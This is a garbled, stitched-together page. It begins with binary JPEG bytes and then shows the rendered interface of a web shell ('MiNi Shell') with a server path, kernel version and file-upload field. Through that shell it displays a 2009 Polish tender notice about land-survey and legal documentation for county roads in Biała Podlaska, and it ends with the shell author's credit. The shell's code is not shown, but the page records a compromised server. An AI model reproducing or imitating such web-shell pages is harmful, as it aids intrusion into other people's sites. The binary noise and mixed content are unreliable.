JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/135940-N-2009.html

<p class="kh_header"><b>Biała Podlaska: Opracowanie dokumentacji geodezyjno - prawnej do uregulowania stanu prawnego gruntów (78 działek) zajętych pod drogi powiatowe w powiecie bialskim w celu uzyskania decyzji Wojewody Lubelskiego potwierdzającej nabycie mienia - nieruchomości na rzecz Powiatu Bialskiego w trybie art. 73 ust. 1 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 z późn. zm.)</b><br>
<b>Numer ogłoszenia: 135940 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Białej Podlaskiej , ul. Sidorska 90A, 21-500 Biała Podlaska, woj. lubelskie, tel. 083 3431909, faks 083 3437975.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> powiatbialski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji geodezyjno - prawnej do uregulowania stanu prawnego gruntów (78 działek) zajętych pod drogi powiatowe w powiecie bialskim w celu uzyskania decyzji Wojewody Lubelskiego potwierdzającej nabycie mienia - nieruchomości na rzecz Powiatu Bialskiego w trybie art. 73 ust. 1 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 z późn. zm.).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji geodezyjno - prawnej do uregulowania stanu prawnego gruntów zajętych pod drogi powiatowe: 
- Nr 1005L Krzewica - Krzymoszyce (6 działek) nr: 237, 238, 239, 240, 241, 242
obręb Wólka Krzymowska;
- Nr 1023L Ossówka - Leśna Podlaska, (5 działek) nr: 24/3, 24/4, 24/5, 24/6, 24/7  obręb Leśna Podlaska;
- Nr 1028L Witoldów - Bubel - Łukowiska (3 działki) nr: 58, 59, 269/3 obręb Bubel Granna;
- obręb skrzyżowania dr. Nr 1039L Rokitno - Michałki z dr. Nr 1040L  (2 działki) nr: 76, 77 m. Michałki, gm. Rokitno;
- Nr 1040L Kolonia Rokitno - Michałki - Kolonia Koczukówka (1 działka) nr: 196, obręb skrzyżowania z dr. gminną w m. Lipnica, gm. Rokitno;
- Nr 1054L  Dobrynka - Kopytów - dr. 816 (1 działka) nr: 721 obręb Kopytów;
- Nr 1063L Zabłocie - Krzywowólka (3 działki) 302/5, 302/6, 303 obręb Zabłocie 
gm. Kodeń;
- Nr 1072L Łomazy - Kolembrody - Wiski (14 działek) nr: 35/2, 60/2, 61/2, 61/10, 130/5, 153/1, 153/3, 153/4, 299/4, 311/2, 552, 564/1, 564/2, 998 obręb Kozły;
- Nr 1073L Kościeniewicze - Ortel Królewski (4 działki) nr: 183/4, 210/1, 227, 715 obręb Kościeniewicze;
- Nr 1074L Kościeniewicze - Wyczółki - Dąbrowica (1 działka) nr: 347/3 obręb Kościeniewicze;
- Nr 1086L dr. pow. 1056L - Mazanówka - Wygnanka - Romanów (36 działek) nr: 58 obręb Wygnanka, 554, 555, 557, 564, 565, 567, 571, 572, 573, 578, 579, 580, 583, 586, 592, 593, 596, 598, 599, 782,  791, 779, 809, 810, 811, 817/2, 820, 821, 822, 823, 824, 825, 830, 833, 860 Lipinki;
- Nr 1130L Kopytów - Elżbiecin (2 działki ) nr: 724/2, 726 obręb Kopytów.       
                                                                                        
1. Materiały wyjściowe
W celu prawidłowego przygotowania oferty należy bezwzględnie zapoznać się ze wszystkimi dokumentami znajdującymi się we właściwym Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej i właściwym organem prowadzącym ewidencje gruntów dotyczącymi tego opracowania.
2. Ogólne wymagania dotyczące prac
2.1. Opracowywana dokumentacja geodezyjna powinna odpowiadać wymogom:
1) ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 z późn. zm.) art.73.
2) ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2007 r., Nr 19, poz. 115 z późn. zm.) art. 34,
3) ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2005 r., Nr 240, poz. 2027  z późn. zm.),
4) ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz. U. z 2004 r., Nr 261, poz. 2603 z późn. zm.),
5) rozporządzenia   Rady Ministrów z dnia 7 grudnia  2004  r.  w sprawie sposobu  i  trybu dokonywania podziałów nieruchomości (Dz. U. Nr 268, poz. 2663),
6) rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 r. w sprawie ewidencji gruntów i budynków (Dz. U.  Nr 38, poz. 454),
7) rozporządzenia   Ministrów   Spraw   Wewnętrznych   i   Administracji   oraz   Rolnictwa i Gospodarki Żywnościowej z dnia  14 kwietnia  1999 r.  w sprawie rozgraniczania nieruchomości (Dz. U. Nr 45, poz. 453),
8)właściwego miejscowo Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej.
2.2. Wykonawca nie może wykorzystać jakichkolwiek wyraźnych błędów lub braków w opisie przedmiotu zamówienia na swoją korzyść. W przypadku gdy Wykonawca wykryje błędy, powinien powiadomić pisemnie Zamawiającego, który wprowadzi niezbędne zmiany lub uzupełnienia. 
3. Zakres opracowania i skład dokumentacji dla Zamawiającego.
3.1. Dokonanie podziału działek ewidencyjnych wchodzących w skład drogi:
należy obliczyć powierzchnię działki drogowej w oparciu o pomiar w terenie i  porównać ją ze stanem ewidencyjnym. W razie różnicy - nie mieszczącej się w granicach dopuszczalnej odchyłki - należy opracować operat techniczny i wystąpić do organu prowadzącego ewidencję gruntów o wydanie decyzji o zmianie powierzchni i uzyskać decyzję.
3.2. Gdy przebieg drogi powiatowej w terenie jest inny niż wynika to z ewidencji gruntów i budynków należy dokonać podziału działek zgodnie ze stanem faktycznym na gruncie oraz sporządzić operat do wprowadzenia zmian w ewidencji gruntów i księgach wieczystych i dokonać odpowiednich zmian w ewidencji gruntów.
3.3. Ustalenie granic pasa drogowego w oparciu o stan faktyczny na gruncie oraz zgodnie z przepisami art. 34 ustawy o drogach publicznych z dnia 21 marca 1985 r. (Dz. U. z 2007 r., Nr 19, poz. 115 z późniejszymi zmianami).
3.4. Dla zajętych na dzień 31.12.1998 r. przez pas drogowy działek osób fizycznych i prawnych należy wykonać podział tych działek i sporządzić mapy projektu podziału oddzielnie dla każdej nieruchomości podlegającej podziałowi, opatrzone stosowną pieczęcią Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej, zgodnie z przepisami rozporządzenia Rady Ministrów z 7 grudnia 2004 r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (Dz. U. Nr 268 poz. 2663) - 4 egz., biorąc pod uwagę interes zarówno zarządcy drogi jak i właścicieli przyległych gruntów.
3.5. Dla działek zajętych na dzień 31.12.1998 r. w części pod elementy pasa drogowego (jezdnię, chodniki, skarpy, rowy) i będących we władaniu Skarbu Państwa, należy sporządzić dodatkowo protokół z ustalenia zajęcia pod drogę z wyszczególnieniem tych elementów oraz z danymi właściciela - dokładny adres (w przypadku zamieszkania na wsi - nr domu), nr dowodu osobistego, PESEL. Protokół winien być podpisany przez właściciela nieruchomości, Wykonawcę oraz przedstawiciela Zarządu Dróg Powiatowych w Białej Podlaskiej podczas czynności okazania granic. 
3.6. Badanie stanu prawnego dzielonych działek i załączenie dokumentów stwierdzających własność nieruchomości dzielonych, w przypadku gdy istnieje:
a) KW - badanie 4-ech działów, w tym co do wpisów hipotek. W przypadku gdy nabycie nieruchomości przez obecnego właściciela nastąpiło po dacie 31.12.1998 r. należy dodatkowo uzyskać akt notarialny nabycia.
b) akt Własności Ziemi, z klauzulą prawomocności, poświadczony za zgodność z oryginałem przez organ wydający - 2 egz. + zaświadczenie z właściwego miejscowo sądu, że dla danej nieruchomości nie jest prowadzona KW ani zbiór dokumentów.
c) wypis  postanowienia sądu opatrzony z klauzulą prawomocności wraz z tytułem własności na poprzedniego właściciela - po 2 egz. + zaświadczenie z właściwego miejscowo sądu, że dla danej nieruchomości nie jest prowadzona KW ani zbiór dokumentów.
d) umowa przekazania gospodarstwa rolnego, z klauzulą prawomocności wraz 
z tytułem własności na poprzedniego właściciela + zaświadczenie z właściwego miejscowo sądu, że dla danej nieruchomości nie jest prowadzona KW ani zbiór dokumentów.
e) inne dokumenty stwierdzające tytuł prawny do nieruchomości dzielonych (decyzje, umowy użytkowania wieczystego, itp.) poświadczone za zgodność z oryginałem - 2 egz. + zaświadczenie z właściwego miejscowo sądu, że dla danej nieruchomości  nie jest prowadzona KW ani zbiór dokumentów.
f) w przypadku gdy właściciel nie żyje i nie przeprowadzono postępowania spadkowego należy załączyć:
- dokumenty własności na nieżyjącego właściciela,
- wykaz domniemanych spadkobierców, ich adresy zamieszkania, telefony,
- na  podstawie aktów zgonu, wystąpienie do właściwego miejscowo Sądu - Wydziału Cywilnego o wydanie zaświadczenia, iż nie było przeprowadzane postępowanie spadkowe po nieżyjących.
g) w przypadku nieuregulowanego stanu prawnego nieruchomości należy załączyć:
- pismo z właściwego organu prowadzącego ewidencję gruntów i budynków, że dla danej nieruchomości brak jest dokumentów własności,
- uzyskanie z właściwego miejscowo sądu Wydziału Ksiąg Wieczystych zaświadczenia, że dla danej nieruchomości nie jest prowadzona księga wieczysta ani zbiór dokumentów.
Uwaga:	
1) W razie stwierdzenia rozbieżności w ewidencji gruntów i budynków - należy je prostować.
2) Na  mapie  projektu  podziału,  dla  działki zajętej  pod  pas drogowy  należy w pozycji: użytki wpisać dr.
3) W   przypadku   różnic   w   numerach   i   powierzchniach   działek   pomiędzy obowiązującą ewidencją a dokumentami własności, należy na mapie projektu podziału zamieścić stosowne klauzule lub wykonać wykaz synchronizacyjny - wykaz zmian gruntowych.
4) W przypadku zmiany nazwy, likwidacji lub utworzenia nowego obrębu objętego danym zadaniem, zakresem opracowania jest podana długość odcinka drogi nawiązana do punktów referencyjnych.
3.7. Sporządzenie mapy orientacyjnej z przebiegu drogi.
3.8. Uaktualnione mapy ewidencyjne dla każdego obrębu zawierające niezbędne  pieczęci służące za podstawę wpisu w KW - 2 egz.
3.9. Kopie protokołów granicznych opatrzone stosową pieczęcią Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej  - 2 egz.
3.10. Stabilizacja trwała pasa drogowego z działkami dzielonymi słupkami betonowymi z napisem  PD. 
3.11. Wszystkie wystąpienia o wydanie stosownych decyzji, dokumentów lub dokonywania jakichkolwiek zmian - przygotowuje Wykonawca na podstawie  pisemnie  udzielonego upoważnienia do występowania w imieniu Zamawiającego.
3.12.  W/w czynności należy wykonać dla 78 działek zgodnie z opisem przedmiotu zamówienia.
4. Odbiór prac
Wykonawca przekazuje do siedziby Zamawiającego kompletną dokumentację    wraz z protokółem zdawczo - odbiorczym w terminie przewidzianym w umowie.
Kompletna dokumentacja oznacza, że opracowanie zawiera wszystkie materiały geodezyjne, prawne, potwierdzone wnioski (o wydanie decyzji, dokumentów lub dokonywania jakichkolwiek zmian) oraz decyzje administracyjne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.43.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki ogólne
O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają następujące warunki:
1) Są uprawnieni  do występowania w obrocie prawnym zgodnie z wymaganiami ustawowymi. 
2) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
3) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
4) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
5) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Warunki szczególne
2.1. Doświadczenie Wykonawcy  
Wykonawca musi wykazać, że w okresie ostatnich  3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia wraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane  z należytą starannością. 
2. 2. Potencjał kadrowy
Wykonawca musi wykazać, że dysponuje osobą/osobami przewidzianymi do realizacji usługi posiadającymi uprawnienia geodezyjne, w tym dokonywanie podziałów nieruchomości.
W przypadku, gdy osoby wskazane przez Wykonawcę  nie są pracownikami Wykonawcy, do oferty należy dołączyć stosowne zobowiązanie do współpracy przy wykonaniu zamówienia.  
3. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana ma podstawie art. 24 ustawy Pzp. Podstawą oceny spełnienia warunków będą w szczególności  wymagane dokumenty i oświadczenia w cz. VI niniejszej Instrukcji, na zasadzie spełnia -nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu  załączy do oferty wypełnione następujące dokumenty i oświadczenia:
1. Wypełniony i podpisany formularz oferty (na załączonym druku ) . 
2. Wykonawca złoży oświadczenie, o spełnieniu warunków określonych w art. 22 ust. 1 uPzp złożone na  druku stanowiącym załącznik Nr 2 do niniejszej Instrukcji. 
3. Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert. Zgłoszenie pochodzące od Wykonawcy nieuprawnionego do występowania w obrocie  prawnym w przedmiocie zamówienia zostanie odrzucone.
4. Potencjał kadrowy  przewidziany do realizacji zamówienia na  załączniku Nr 2 z udokumentowaniem ich doświadczenia i kwalifikacji zawodowych. Do wykazu personelu muszą być dołączone kopie odpowiednich uprawnień geodezyjnych, potwierdzone za zgodność z oryginałem przez osoby uprawnione do składania oświadczeń woli. 
5.Doświadczenie Wykonawcy. Wykaz co najmniej dwóch usług zrealizowanych w ciągu ostatnich 3 lat odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia  na załączniku Nr 3 oraz załączeniem  dokumentów potwierdzających, że roboty te zostały wykonane należycie. 
6. Zaakceptowane przez Wykonawcę Istotne postanowienia umowy. 
7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu, albo w postępowaniu i zawarciu umowy w sprawie niniejszego zamówienia. Do oferty należy załączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców  ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.
8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o którym mowa w pkt. 3., 5. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
8.1. Dokumenty, o których mowa w pkt.8 lit. a i c  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Dokument, o którym mowa w pkt. 8. lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 8 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio dla kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
9. Dokumenty powinny być złożone w formie oryginału lub kopii poświadczonej 
za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym należy składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatbialski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Białej Podlaskiej ul. Sidorska 90A pok. nr 6 lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Białej Podlaskiej ul. Sidorska 90A pok. nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com